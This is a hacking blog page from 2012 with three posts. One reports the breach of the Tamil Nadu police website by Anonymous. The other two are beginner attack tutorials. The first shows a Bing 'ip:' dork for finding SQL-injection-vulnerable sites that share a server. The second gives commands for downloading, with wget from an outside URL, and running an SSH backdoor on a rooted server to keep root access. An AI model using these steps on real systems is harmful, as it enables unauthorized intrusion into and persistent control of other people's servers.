Showing posts with label Website hacking. Show all posts
Showing posts with label Website hacking. Show all posts

Wednesday, 11 July 2012

TN Cyber Crime Cell to investigate hacking of website

The Tamil Nadu police on Tuesday night said the Cyber Crime Cell has been asked to investigate the hacking of its website by Anonymous, a ‘hacktivist’ group.

In a statement here, Director General of Police K. Ramanujam said no defacing of the police website had taken place. “Data in the grievances database relating to complaints received online from the public and action taken on them have been taken and published,” he said.



The website, now being maintained by National Informatics Centre,a Science and Technology institution of the Centre, was intruded reportedly by 'Anonymous,' which has been protesting denial of access to certain websites by Internet Service Providers in pursuance of a copyright violation suit.


Thursday, 26 April 2012

Using Bing for finding Sqli Vulnerable Sites

Hi guys , today i will show you a basic Dork to find Sqli sites  . Its very simple & No0b Friendly  :))

Things Required :

  • A Sqli vulnerable site

Step By Step Tutorial  :
  • Now here we have only a single sqli vulnerable site,  so now there are chances that the other sites hosted on that server  would be vulnerable to Sqli ! . so we will use Bing Dork to find them, but Before using the Bing Dork we have to find out the website Ip address so we will use this website to find it - You get Signal .







  • Once you have got the IP address, now we will use the dork given below 


ip:123.45.212.55 php?id=   

Note: 123.45.212.55 (your sites IP address)

 This dork tells the search engine to find the sites Hosted on that IP address which has the following URL in it (php?id=)  .








  • So now you can test all the URl's & in case if it is an asp site then accordingly change the Dork (.asp?id=) .

Problem ? Comment !

Saturday, 21 April 2012

Installing Backdoor in a server

Hey friends after the server rooting tutorial today i will tell you how to backdoor the server in few steps ;) .









Things Required :

  • Rooted server
  • Ssh backdoor
Step By Step Tutorial
  • Once we have rooted our server now we will install backdoor in it .. so to do it we will download the ssh backdoor file, we will use wget command to download it . 
Type: wget http://www.someurl.com/sshbd.zip
  • Now after we have downloaded it , we will unzip it . to unzip it we will use the following 
Type: unzip sshbd.zip
  • The after you have unziped it, now you have to run it so we will type the following command to run it 
Type: ./sshbd anypassword anyport


Note: In the above command sshbd is our backdoor file name, anypassword means there you have to write any password of your choice & in the last anyport which means you have to write any port number there . 

Now you can connect with putty & enjoy as root ;) 


Hope you all liked this simple & small tutorial !